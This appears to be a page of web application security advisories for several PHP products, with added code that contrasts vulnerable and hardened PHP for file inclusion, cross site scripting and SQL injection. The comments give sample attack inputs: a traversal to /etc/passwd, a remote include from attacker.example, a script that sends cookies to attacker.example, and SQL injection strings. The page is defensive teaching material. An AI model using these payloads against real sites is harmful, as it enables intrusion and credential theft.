Title | Vulnerabilities In WHM Autopilot
Info | Started by a webhost looking for more out of a simple management
script, Brandee Diggs (Owner of Spinn A Web Cafe, Founder of
Benchmark Designs) set out to build an internal management system
that could handle the day-to-day operations of a normal hosting
company. The key was to remove the need to constantly watch your
orders and manage the installs. Alas, WHM AutoPilot was born.
[ as quoted from their official website ] WHM AutoPilot is affected
by several issues, including cross site scripting, file inclusion,
and information disclosure.
Date | December 27, 2021
BID | Not Available
Credit | James Bercegay

Title | Critical Vulnerability In Help Center Live
Info | Help Center Live is a "live" help desk system written in PHP with a MySQL
database backend that combines Live Support, Trouble Tickets and an FAQ in one
project. It is a very popular application, especially with webhosts and other
service providers. Two file include vulnerabilities (one remote, one local) exist
that could allow an attacker to execute malicious server-side code on your
webserver. Additionally, a cross site scripting issue was found in Help Center Live.
Date | December 24, 2021
BID | Not Available
Credit | James Bercegay
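The file inclusion class named in the Help Center Live entry comes down to one PHP pattern: a request parameter that ends up in an `include`. The block below is an added illustration, not Help Center Live's own code; the `page` parameter, the `templates` directory and the file names in it are hypothetical. It shows the vulnerable form and a hardened replacement that maps the untrusted value onto an allow-list and then checks the resolved path.

```php
<?php
// Added illustration, not Help Center Live's own code: the PHP include
// pattern behind local and remote file inclusion, and a hardened form.
// The `page` parameter, the templates directory and the file names are
// hypothetical.

// VULNERABLE: the request controls what gets included.
//   ?page=../../../../etc/passwd     -> local file inclusion (the appended
//                                       ".php" was bypassable with %00 on
//                                       old PHP releases)
//   ?page=http://attacker.example/x  -> remote code execution when
//                                       allow_url_include=On
function render_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// HARDENED: map the untrusted token onto an allow-list, then confirm the
// resolved path still lives under the templates directory.
function render_page_hardened(string $page): void
{
    $allowed = [
        'home'    => 'home.php',
        'tickets' => 'tickets.php',
        'faq'     => 'faq.php',
    ];
    if (!isset($allowed[$page])) {
        http_response_code(404);
        exit('unknown page');
    }

    $base = realpath(__DIR__ . '/templates');
    $path = realpath($base . '/' . $allowed[$page]);
    // realpath() is false for a missing file; the prefix test also catches
    // a template that was replaced by a symlink pointing outside $base.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        exit('unknown page');
    }
    include $path;
}

render_page_hardened($_GET['page'] ?? 'home');
```

The allow-list is what removes the vulnerability; the `realpath` prefix check is defence in depth against the files under `templates/` themselves being tampered with. Independently of the code, `allow_url_include` should stay `Off` in php.ini (its default since PHP 5.2), which closes the remote variant for any include the application still builds from user input.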

Title | Cross Site Scripting In Psychostats
Info | PsychoStats is a statistics generator for games. Currently there is support
for a handful of Half-Life "MODs" including Counter-Strike, Day of Defeat,
and Natural Selection. PsychoStats gathers statistics from the log files that
game servers create by reading through the logs and then calculating detailed
statistics for players, maps, weapons and clans. These detailed statistics
are stored in a MySQL database and are then viewed online from your website
using a set of PHP web pages. Cross site scripting exists in Jason Morriss'
PsychoStats because user-supplied input is not checked properly before it is
rendered. This vulnerability could be used to steal cookie-based
authentication credentials within the scope of the current domain, or to run
hostile code in a victim's browser.
Date | December 22, 2021
BID | Not Available
Credit | James Bercegay
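The cookie-theft consequence described for PsychoStats (and the cross site scripting noted in the WHM AutoPilot, Help Center Live, Kayako and phpGroupWare entries) follows from reflecting a request value into HTML without encoding it. The block below is an added illustration, not PsychoStats code; the `player` parameter is hypothetical. It shows the unencoded output, the encoded fix, and the session-cookie flags that limit what a script injected this way can read.

```php
<?php
// Added illustration, not PsychoStats code: reflecting a query parameter
// into HTML without encoding, and the fix. The `player` parameter is
// hypothetical.

// VULNERABLE: the value is emitted as markup. A request such as
//   ?player=<script>location='http://attacker.example/?c='%2Bdocument.cookie</script>
// runs in the victim's browser under this site's origin and can read any
// cookie that is not HttpOnly.
function player_heading_vulnerable(string $player): string
{
    return "<h1>Stats for " . $player . "</h1>";
}

// HARDENED: encode for the context the value lands in (HTML text here).
// ENT_QUOTES also covers attribute contexts; ENT_SUBSTITUTE avoids an
// empty string on invalid UTF-8, which would otherwise hide the input.
function player_heading_hardened(string $player): string
{
    $safe = htmlspecialchars($player, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<h1>Stats for " . $safe . "</h1>";
}

// Defence in depth: a session cookie that scripts cannot read is not
// stolen by document.cookie, even if an encoding bug remains somewhere.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

header('Content-Type: text/html; charset=UTF-8');
echo player_heading_hardened($_GET['player'] ?? '');
```

Output encoding has to match the context: the same value placed inside a `<script>` block or a URL needs JavaScript or URL encoding instead, and `htmlspecialchars` alone is not sufficient there. The `HttpOnly` flag (supported by the array form of `session_set_cookie_params` from PHP 7.3) is a mitigation only; an injected script can still act as the user within the page without ever reading the cookie.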

Title | Multiple Kayako eSupport Vulnerabilities
Info | Kayako eSupport is one of the most feature-packed support systems. This program is used by
many online businesses and webhosts to handle technical support and other
support issues. This application is vulnerable to both Cross Site Scripting and SQL Injection.
The SQL Injection vulnerabilities are fairly serious and may allow an
attacker to alter the SQL queries the application runs. Full details inside.
Date | December 18, 2021
BID | 12037
Credit | James Bercegay

Title | Multiple phpGroupWare Vulnerabilities
Info | phpGroupWare (formerly known as webdistro) is a multi-user
groupware suite written in PHP. It provides a Web-based calendar,
todo-list, addressbook, email, news headlines, and a file manager.
The calendar supports repeating events. The email system supports
inline graphics and file attachments. The system as a whole supports
user preferences, themes, user permissions, multi-language support,
an advanced API, and user groups. A number of vulnerabilities have been
found in phpGroupWare, including Cross Site Scripting, SQL Injection, and
Full Path Disclosure. This application ships with some Linux distributions,
so check whether you have it installed. The SQL Injection can be fairly critical.
Date | December 14, 2021
BID | 11952
Credit | James Bercegay
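The SQL injection issues that the Kayako eSupport and phpGroupWare entries both rate as serious come from building the query string out of request data. The block below is an added illustration, not code from either project; the `tickets` and `staff` tables, their columns, the `id` parameter and the connection details are hypothetical. It puts the string-built query beside a parameterised one, which is the fix for the whole class.

```php
<?php
// Added illustration, not Kayako eSupport or phpGroupWare code: a
// string-built query versus a parameterised one. Table, column and
// parameter names and the DSN are hypothetical.

// VULNERABLE: the ticket id is concatenated into the statement.
//   ?id=1 OR 1=1                               -> returns every ticket
//   ?id=0 UNION SELECT 1,password FROM staff   -> reads another table
function find_ticket_vulnerable(PDO $db, string $id): ?array
{
    $res = $db->query("SELECT id, subject FROM tickets WHERE id = " . $id);
    $row = $res ? $res->fetch(PDO::FETCH_ASSOC) : false;
    return $row === false ? null : $row;
}

// HARDENED: validate the type, then bind the value. A bound parameter is
// sent separately from the statement text and cannot change its shape.
function find_ticket_hardened(PDO $db, string $id): ?array
{
    if (!ctype_digit($id)) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, subject FROM tickets WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('mysql:host=localhost;dbname=support;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    // Real server-side prepared statements rather than client-side
    // escaping emulated by the driver.
    PDO::ATTR_EMULATE_PREPARES => false,
]);

var_dump(find_ticket_hardened($db, $_GET['id'] ?? ''));
```

The `ctype_digit` check is input validation, not the fix on its own; the binding is what makes the value inert. Escaping functions such as `mysql_real_escape_string`, which applications of this era relied on, only protect quoted string literals and do nothing for a numeric comparison like the one above, which is why a prepared statement is preferred for every query that carries user data.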